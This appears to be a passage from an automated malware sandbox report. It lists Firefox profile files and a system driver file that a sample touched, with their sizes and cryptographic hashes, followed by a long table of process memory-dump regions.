                                                                                                                                                                                            SHA1

                                                                                                                                                                                            7b4714683256f584aa9d002e195c43a88b7ecee7

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            4b31ade6d1f57bbf87de6e4dbbf32310d88e38f60351bf544249a8fa1186bac0

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            7c13cd425cba75cc2554a0a75babc64b3d737f6f75536b24701ab51a1e4d421b546b572a58adfd4359332a38a75801ab58400d3eea708abaddbb8194ed2b9c15

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\prefs-1.js

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            6KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            540d6639336cfa2affbfce38b2f54704

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            38805050394371c650c22e7860db3f8d81c5d473

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            fae9125e38862c3a17dabcb68407f7898f37b6e79982c799e413b554131906b7

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            f7794c2fd9b1b42d3fd25303c4265f67a078928ec005da2d694b5ba47c0b621bfcda68346cae4dd444caf4c61e9a90703d78b62ae7c583b6abd7bfb787ef1c41

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\prefs-1.js

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            12KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            4dcb55e11a7890efc4b8eaea6def419b

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            3f3f6added418522008b1b1949142e88c1b1e4d6

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            0a57a08f4a155b5282a2f093b47104eaa22e080044d812baae41945283ae0a37

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            cb15ddf8efa99a88cb06872cf78cf46095cf5ff99e9c585ee6b09b09f9b9e771d84ce878672b73d9dfdb6786754da1266079b1a95972c2a293cc4222d225d323

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\prefs.js

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            6KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            19be8e9d1023c81792a26384ea51ccc9

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            e34af3d102e340b8b4d8aca8236886d4d3949cea

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            25e302628eab2691baf82a573e8ef4e7f9d6806bd25b82dd831eb2d3e0f316d9

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            3b6c43a84d1ffe02a5740135a90e3ea399c082c23caca207f2d49fd345d112b063c5a6975d356962921f18db207dc8d7a741bd6c1c05b06892c1848b088a30d2

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\prefs.js

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            6KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            2dd73ab557688f3e9b42f3e8a6f01a07

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            c72f0ba3adc592ae91caba3e796f6ab65d4fd490

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            032eb868986748749d515224e4e5000028b51f7be06abc86fb7e8e5d60d191a4

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            0628b45ed0ae5e2bb44a672ab63d4af125b0fc001fff64ac518ece2d9678d82969191043a7ac330421cc3c43a9357039851a7708e725e3dfdebf8e103e13dc1c

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\sessionstore-backups\recovery.jsonlz4

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            81e3b81a0bd0612a7b8e7678e301b56c

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            05db102ac75e76726b47836d356de559bb3bf480

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            70718391caed391f194355a769d5b37a7740a1c7fd8c057bc77dfd58ff7b8dd6

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            8164c62f432ce3bd90d84f5c4a724fc6b8bfb3a2e90cdd0460682328e2e45fc8dc703d03dec3d4c65678f4893db7ad87a838ab6d09edfcc5f6ff607b8f633f45

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            2.3MB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            9a8b80fc21aa635db32b61b701d7e922

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            0fc501b4fe78640a1ff79bebf947d38acd65aca7

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            663560d960a72bbc80e9599f24e79f6a90fc20480d40583896ffac1f530e97de

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            03e6d067e640dd31d5284f50ef23e7ab9f69090cc64033042bd4c50a2393331d1075df11bc8aa2ccbe1e3a03de620fabfb0a2fe30581287332069b6d4ed52ce2

                                                                                                                                                                                          • C:\Windows\System32\drivers\klupd_b296ad91a_klbg.sys

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            199KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            424b93cb92e15e3f41e3dd01a6a8e9cc

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            2897ab04f69a92218bfac78f085456f98a18bdd3

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            15e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f

                                                                                                                                                                                          • memory/1044-87-0x0000000000090000-0x00000000000BE000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            184KB

                                                                                                                                                                                          • memory/1048-1570-0x0000000000720000-0x0000000000DB4000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            6.6MB

                                                                                                                                                                                          • memory/1048-124-0x0000000000720000-0x0000000000DB4000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            6.6MB

                                                                                                                                                                                          • memory/1048-125-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            972KB

                                                                                                                                                                                          • memory/1048-523-0x0000000000720000-0x0000000000DB4000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            6.6MB

                                                                                                                                                                                          • memory/1048-1473-0x0000000000720000-0x0000000000DB4000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            6.6MB

                                                                                                                                                                                          • memory/1048-525-0x0000000000720000-0x0000000000DB4000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            6.6MB

                                                                                                                                                                                          • memory/1972-1601-0x0000000000020000-0x00000000004E5000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.8MB

                                                                                                                                                                                          • memory/1972-21-0x0000000000020000-0x00000000004E5000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.8MB

                                                                                                                                                                                          • memory/1972-53-0x0000000000020000-0x00000000004E5000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.8MB

                                                                                                                                                                                          • memory/1972-1394-0x0000000000020000-0x00000000004E5000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.8MB

                                                                                                                                                                                          • memory/1972-88-0x0000000000020000-0x00000000004E5000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.8MB

                                                                                                                                                                                          • memory/1972-18-0x0000000000020000-0x00000000004E5000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.8MB

                                                                                                                                                                                          • memory/1972-522-0x0000000000020000-0x00000000004E5000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.8MB

                                                                                                                                                                                          • memory/1972-52-0x0000000000020000-0x00000000004E5000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.8MB

                                                                                                                                                                                          • memory/1972-122-0x0000000000020000-0x00000000004E5000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.8MB

                                                                                                                                                                                          • memory/1972-19-0x0000000000021000-0x000000000004F000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            184KB

                                                                                                                                                                                          • memory/1972-3783-0x0000000000020000-0x00000000004E5000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.8MB

                                                                                                                                                                                          • memory/1972-20-0x0000000000020000-0x00000000004E5000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.8MB

                                                                                                                                                                                          • memory/2200-108-0x0000000000660000-0x0000000000965000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            3.0MB

                                                                                                                                                                                          • memory/2200-106-0x0000000000660000-0x0000000000965000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            3.0MB

                                                                                                                                                                                          • memory/2460-17-0x0000000000880000-0x0000000000D45000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.8MB

                                                                                                                                                                                          • memory/2460-0-0x0000000000880000-0x0000000000D45000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.8MB

                                                                                                                                                                                          • memory/2460-1-0x0000000077504000-0x0000000077506000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            8KB

                                                                                                                                                                                          • memory/2460-2-0x0000000000881000-0x00000000008AF000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            184KB

                                                                                                                                                                                          • memory/2460-3-0x0000000000880000-0x0000000000D45000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.8MB

                                                                                                                                                                                          • memory/2460-4-0x0000000000880000-0x0000000000D45000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.8MB

                                                                                                                                                                                          • memory/2468-7327-0x00000219BFE30000-0x00000219BFE52000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            136KB

                                                                                                                                                                                          • memory/3008-1400-0x0000000000E70000-0x0000000001307000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.6MB

                                                                                                                                                                                          • memory/3008-1333-0x0000000000E70000-0x0000000001307000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.6MB

                                                                                                                                                                                          • memory/3948-4811-0x0000000000400000-0x0000000000687000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            2.5MB

                                                                                                                                                                                          • memory/4236-68-0x0000000000400000-0x0000000000462000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            392KB

                                                                                                                                                                                          • memory/4236-69-0x0000000000400000-0x0000000000462000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            392KB

                                                                                                                                                                                          • memory/4696-1561-0x0000000000020000-0x00000000004E5000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.8MB

                                                                                                                                                                                          • memory/4696-1560-0x0000000000020000-0x00000000004E5000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.8MB

                                                                                                                                                                                          • memory/5024-904-0x0000000001000000-0x000000000144C000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.3MB

                                                                                                                                                                                          • memory/5024-895-0x0000000001000000-0x000000000144C000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.3MB

                                                                                                                                                                                          • memory/5024-1508-0x0000000001000000-0x000000000144C000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.3MB

                                                                                                                                                                                          • memory/5024-1484-0x0000000001000000-0x000000000144C000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.3MB

                                                                                                                                                                                          • memory/5024-905-0x0000000001000000-0x000000000144C000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.3MB

                                                                                                                                                                                          • memory/5580-7495-0x00000000007D0000-0x0000000000958000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.5MB

                                                                                                                                                                                          • memory/5580-7489-0x00000000007D0000-0x0000000000958000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.5MB

                                                                                                                                                                                          • memory/5580-7487-0x0000000140000000-0x000000014043B000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.2MB

                                                                                                                                                                                          • memory/5580-7490-0x00000000007D0000-0x0000000000958000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.5MB

                                                                                                                                                                                          • memory/5580-7491-0x00000000007D0000-0x0000000000958000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.5MB

                                                                                                                                                                                          • memory/5580-7492-0x00000000007D0000-0x0000000000958000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.5MB

                                                                                                                                                                                          • memory/5580-7493-0x00000000007D0000-0x0000000000958000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.5MB

                                                                                                                                                                                          • memory/5580-7494-0x00000000007D0000-0x0000000000958000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.5MB

                                                                                                                                                                                          • memory/5580-7496-0x00000000007D0000-0x0000000000958000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.5MB

                                                                                                                                                                                          • memory/5580-7497-0x00000000007D0000-0x0000000000958000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.5MB

                                                                                                                                                                                          • memory/5580-7498-0x00000000007D0000-0x0000000000958000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.5MB

                                                                                                                                                                                          • memory/5580-7499-0x00000000007D0000-0x0000000000958000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.5MB

                                                                                                                                                                                          • memory/6372-1824-0x00000000000C0000-0x0000000000EA9000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            13.9MB

                                                                                                                                                                                          • memory/6504-5116-0x0000024F453A0000-0x0000024F45411000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            452KB

                                                                                                                                                                                          • memory/6504-4862-0x0000000000860000-0x0000000000862000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            8KB

                                                                                                                                                                                          • memory/6504-4911-0x0000024F453A0000-0x0000024F45411000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            452KB

                                                                                                                                                                                          • memory/6504-4895-0x0000024F453A0000-0x0000024F45411000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            452KB

                                                                                                                                                                                          • memory/6504-5117-0x0000024F453A0000-0x0000024F45411000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            452KB

                                                                                                                                                                                          • memory/8332-36025-0x0000000005530000-0x0000000005552000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            136KB

                                                                                                                                                                                          • memory/8332-36026-0x00000000055D0000-0x0000000005636000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            408KB

                                                                                                                                                                                          • memory/8332-36060-0x0000000007710000-0x0000000007D8A000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            6.5MB

                                                                                                                                                                                          • memory/8332-36061-0x0000000006160000-0x000000000617A000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            104KB

                                                                                                                                                                                          • memory/8332-36042-0x0000000006280000-0x00000000062CC000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            304KB

                                                                                                                                                                                          • memory/8332-36020-0x0000000002710000-0x0000000002746000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            216KB

                                                                                                                                                                                          • memory/8332-36021-0x0000000004E50000-0x0000000005478000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            6.2MB

                                                                                                                                                                                          • memory/8332-36041-0x0000000005CD0000-0x0000000005CEE000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            120KB

                                                                                                                                                                                          • memory/8332-36027-0x0000000005640000-0x00000000056A6000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            408KB

                                                                                                                                                                                          • memory/8332-36028-0x00000000056B0000-0x0000000005A04000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            3.3MB

                                                                                                                                                                                          • memory/11732-35514-0x0000000000020000-0x00000000004E5000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.8MB

                                                                                                                                                                                          • memory/11732-35518-0x0000000000020000-0x00000000004E5000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4.8MB

                                                                                                                                                                                          • memory/12808-35692-0x0000000000400000-0x0000000000E16000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            10.1MB

                                                                                                                                                                                          • memory/12808-35979-0x0000000000400000-0x0000000000E16000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            10.1MB

                                                                                                                                                                                          • memory/12808-35918-0x0000000000400000-0x0000000000E16000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            10.1MB

                                                                                                                                                                                          • memory/13136-36023-0x0000000000400000-0x0000000000CC6000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            8.8MB

                                                                                                                                                                                          • memory/13136-35717-0x0000000000400000-0x0000000000CC6000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            8.8MB